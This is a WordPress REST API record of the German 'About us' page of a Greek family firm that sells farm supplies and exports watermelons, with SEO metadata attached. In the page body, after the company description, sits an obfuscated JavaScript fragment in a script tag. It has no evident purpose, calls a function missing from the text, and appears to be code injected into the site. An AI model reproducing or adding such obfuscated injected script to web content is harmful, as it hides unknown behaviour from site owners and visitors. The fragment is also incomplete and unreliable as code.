{"id":28,"date":"2023-02-02T09:46:03","date_gmt":"2023-02-02T09:46:03","guid":{"rendered":"https:\/\/tzioutzias.gr\/?page_id=28"},"modified":"2024-04-15T18:51:35","modified_gmt":"2024-04-15T15:51:35","slug":"about","status":"publish","type":"page","link":"https:\/\/tzioutzias.gr\/de\/about\/","title":{"rendered":"Wer sind wir"},"content":{"rendered":"<section class=\"wpb-content-wrapper\"><div data-vc-full-width=\"true\" data-vc-full-width-init=\"false\" class=\"vc_row wpb_row vc_row-fluid vc_row-o-content-middle vc_row-flex\"><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_text_column wpb_content_element  wpb_animate_when_almost_visible wpb_fadeIn fadeIn\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<p class=\" translation-block\">Unser Unternehmen \u00b4\u00b4Charis Tzioutzias GBR\u00b4\u00b4 ist seit drei Jahrzehnten ununterbrochen im Agrar- und Exportsektor pr\u00e4sent und hat seinen Hauptsitz in Zacharo  Ilias.<\/p>\n<p>Es wurde 1990von dem Agronomen Charis Tzioutzias, einem Absolventen der Aristoteles Universit\u00e4t Thessaloniki, gegr\u00fcndet.<\/p>\n<p>Es ist ein reines Familienunternehmen, bestehend aus Charis Tzioutzias, seiner Frau Christina Pantazopoulou und den S\u00f6hnen Geroge und Panagiotis Tzioutzias. Alle Familienmitglieder sind Agrarwissenschaftler.<\/p>\n<p>Unser Unternehmen hat sich zum Ziel gesetzt, die Erzeuger von der Anfangsphase der Etablierung der Kulturen bis zur Markteif\u00fchrung des Produktes kontinuierlich zu unterst\u00fctzen und ist im Prim\u00e4rsektor mit einer Vielzahl von Ma\u00dfnahmen t\u00e4tig:<\/p>\n<ul>\n<li>Handel-Export landwirtschaftlicher Produkte mit dem exportf\u00e4higen Produkt Wassermelone, das ganz Deutschland, sowie andere L\u00e4nder Mittel und Nordeuropas erreicht, da wir seit 1993 im Export griechischer Wassermelonen t\u00e4tig sind.<\/li>\n<li>Verkauf von landwirtschaftlichen Versorgungsmaterial, D\u00fcngemitteln, Saatgut und Vermehrungsmaterial, mit moderner wissenschaftlicher \u00dcberwachung und F\u00fchrung der Ernte durch die Agronomen unseres Unternehmens.<\/li>\n<li>Zusammenstellung von Investitionsprogrammen \u2013 Studien f\u00fcr Verbesserungspl\u00e4ne, neue Landwirte und alle Arten von Investitionen, die den griechischen Landwirt betreffen.<\/li>\n<\/ul>\n\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center  wpb_animate_when_almost_visible wpb_slideInUp slideInUp\">\n\t\t\n\t\t<figure class=\"wpb_wrapper vc_figure\">\n\t\t\t<a class=\"\" data-lightbox=\"lightbox[rel-28-235040836]\" href=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1025-858x1024.jpg\" target=\"_self\"><img loading=\"lazy\" decoding=\"async\" width=\"1006\" height=\"1200\" src=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1025.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"xaris-tzioutzias-watermelons-7\" title=\"xaris-tzioutzias-watermelons-7\" srcset=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1025.jpg 1006w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1025-252x300.jpg 252w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1025-858x1024.jpg 858w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1025-768x916.jpg 768w\" sizes=\"auto, (max-width: 1006px) 100vw, 1006px\" \/><\/a>\n\t\t<\/figure>\n\t<\/div>\n<\/div><\/div><\/div><\/div><div class=\"vc_row-full-width vc_clearfix\"><\/div><div class=\"vc_row wpb_row vc_row-fluid\"><div class=\"wpb_column vc_column_container vc_col-sm-12\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_text_column wpb_content_element\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<p>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><\/div>\n<\/section>","protected":false},"excerpt":{"rendered":"Our company \"CHARIS TZIOUTZIAS P.C.\" has been","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page.php","meta":{"footnotes":""},"class_list":["post-28","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Greek Watermelons | Tzioutzias Charis<\/title>\n<meta name=\"description\" content=\"Charis Tzioutzias P.C. has been running its third decade of continuous presence in the agricultural and export sector and has its headquarters in Zacharo Ilias.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tzioutzias.gr\/de\/about\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Greek Watermelons | Tzioutzias Charis\" \/>\n<meta property=\"og:description\" content=\"Charis Tzioutzias P.C. has been running its third decade of continuous presence in the agricultural and export sector and has its headquarters in Zacharo Ilias.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tzioutzias.gr\/de\/about\/\" \/>\n<meta property=\"og:site_name\" content=\"Tzioutzias Charis\" \/>\n<meta property=\"article:modified_time\" content=\"2024-04-15T15:51:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"533\" \/>\n\t<meta property=\"og:image:height\" content=\"320\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data1\" content=\"2\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/about\\\/\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/about\\\/\",\"name\":\"Greek Watermelons | Tzioutzias Charis\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#website\"},\"datePublished\":\"2023-02-02T09:46:03+00:00\",\"dateModified\":\"2024-04-15T15:51:35+00:00\",\"description\":\"Charis Tzioutzias P.C. has been running its third decade of continuous presence in the agricultural and export sector and has its headquarters in Zacharo Ilias.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/about\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/tzioutzias.gr\\\/about\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/about\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u0391\u03c1\u03c7\u03b9\u03ba\u03ae\",\"item\":\"https:\\\/\\\/tzioutzias.gr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"About Us\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#website\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"name\":\"Tzioutzias Charis\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/tzioutzias.gr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#organization\",\"name\":\"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/main-image.png\",\"contentUrl\":\"https:\\\/\\\/tzioutzias.gr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/main-image.png\",\"width\":533,\"height\":320,\"caption\":\"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2\"},\"image\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Greek Watermelons | Tzioutzias Charis","description":"Charis Tzioutzias P.C. has been running its third decade of continuous presence in the agricultural and export sector and has its headquarters in Zacharo Ilias.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tzioutzias.gr\/de\/about\/","og_locale":"de_DE","og_type":"article","og_title":"Greek Watermelons | Tzioutzias Charis","og_description":"Charis Tzioutzias P.C. has been running its third decade of continuous presence in the agricultural and export sector and has its headquarters in Zacharo Ilias.","og_url":"https:\/\/tzioutzias.gr\/de\/about\/","og_site_name":"Tzioutzias Charis","article_modified_time":"2024-04-15T15:51:35+00:00","og_image":[{"width":533,"height":320,"url":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Gesch\u00e4tzte Lesezeit":"2\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tzioutzias.gr\/about\/","url":"https:\/\/tzioutzias.gr\/about\/","name":"Greek Watermelons | Tzioutzias Charis","isPartOf":{"@id":"https:\/\/tzioutzias.gr\/#website"},"datePublished":"2023-02-02T09:46:03+00:00","dateModified":"2024-04-15T15:51:35+00:00","description":"Charis Tzioutzias P.C. has been running its third decade of continuous presence in the agricultural and export sector and has its headquarters in Zacharo Ilias.","breadcrumb":{"@id":"https:\/\/tzioutzias.gr\/about\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tzioutzias.gr\/about\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/tzioutzias.gr\/about\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u0391\u03c1\u03c7\u03b9\u03ba\u03ae","item":"https:\/\/tzioutzias.gr\/"},{"@type":"ListItem","position":2,"name":"About Us"}]},{"@type":"WebSite","@id":"https:\/\/tzioutzias.gr\/#website","url":"https:\/\/tzioutzias.gr\/","name":"Tzioutzias Charis","description":"","publisher":{"@id":"https:\/\/tzioutzias.gr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tzioutzias.gr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/tzioutzias.gr\/#organization","name":"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2","url":"https:\/\/tzioutzias.gr\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/tzioutzias.gr\/#\/schema\/logo\/image\/","url":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","contentUrl":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","width":533,"height":320,"caption":"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2"},"image":{"@id":"https:\/\/tzioutzias.gr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages\/28","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/comments?post=28"}],"version-history":[{"count":0,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages\/28\/revisions"}],"wp:attachment":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/media?parent=28"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}